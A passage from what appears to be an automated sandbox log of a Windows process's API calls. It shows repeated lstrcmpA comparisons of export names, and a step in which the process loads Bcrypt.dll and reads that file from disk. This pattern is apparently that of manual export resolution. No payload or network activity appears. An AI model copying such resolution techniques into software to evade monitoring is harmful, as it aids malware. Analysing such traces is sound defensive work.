(lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0207.044] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0207.045] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0207.045] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0207.045] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0207.045] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0207.045] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0207.045] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0207.045] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0207.045] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0207.045] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0207.045] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0207.045] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0207.045] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0207.045] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0207.045] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.045] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0207.045] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.045] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0207.045] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0207.045] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0207.045] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0207.045] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0207.045] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0207.046] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0207.046] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0207.046] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0207.046] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0207.046] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0207.046] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0207.046] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0207.046] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0207.046] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0207.046] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0207.047] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0207.047] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0207.047] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0207.047] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0207.047] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0207.047] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0207.047] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0207.047] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0207.047] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0207.047] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0207.047] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0207.047] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0207.048] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0207.874] GetProcessHeap () returned 0x4a0000 [0207.875] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4118040 | out: hHeap=0x4a0000) returned 1 [0209.488] GetProcessHeap () returned 0x4a0000 [0209.488] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9300 [0209.489] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0209.495] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0209.496] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0209.496] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0209.496] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0209.497] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0209.497] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0209.497] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0209.497] GetProcessHeap () returned 0x4a0000 [0209.497] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26fa0) returned 0x2d52010 [0209.499] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0209.499] ReadFile (in: hFile=0x15c, lpBuffer=0x2d52010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d52010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0209.859] CloseHandle (hObject=0x15c) returned 1 [0209.859] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0209.860] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0209.860] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0209.860] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0209.860] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.860] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0209.860] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0209.860] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.860] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.860] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0209.860] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0209.860] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.861] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.861] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0209.861] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0209.861] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0209.861] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.861] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.861] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0209.861] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0209.862] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0209.862] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0209.862] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.862] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.862] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0209.862] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0209.862] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0209.862] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0209.862] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0209.862] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.862] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.863] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0209.863] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0209.863] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0209.863] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0209.863] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0209.863] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0209.863] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0209.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0209.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0209.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0209.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0209.864] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0209.864] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0209.864] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.864] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.864] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0209.864] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0209.864] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0209.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0209.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0209.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0209.865] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0209.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0209.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0209.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0209.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0209.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0209.865] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0209.866] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0209.867] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.867] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.867] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0209.867] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0209.867] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0209.867] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0209.867] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0209.867] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0209.867] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0209.867] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0209.867] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0209.867] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0209.868] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0209.868] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.868] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.868] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0209.868] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0209.868] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0209.868] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0209.868] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0209.869] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0209.869] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0209.870] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0209.870] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0209.870] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0209.870] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0209.871] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0209.871] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.871] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.871] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0209.871] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0209.871] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0209.871] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0209.871] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0209.872] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0209.872] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0209.872] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0209.872] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0209.872] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0209.872] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0209.872] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0209.872] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0209.873] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.873] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.873] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0209.873] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0209.873] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0209.874] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0209.874] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0209.874] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0209.874] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0209.874] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0209.874] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0209.874] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0209.874] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0209.875] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0209.875] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0209.875] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0209.875] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.875] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.875] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0209.875] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0209.875] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0209.875] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0209.876] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0209.876] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0209.876] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0209.876] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0209.876] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0209.876] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0209.876] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0209.876] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0209.877] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0209.877] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0209.879] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0209.879] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0209.879] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0209.879] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0209.879] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0209.879] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0209.879] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0209.879] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0209.879] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0209.880] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0209.880] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0209.880] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0209.880] lstrcmpA 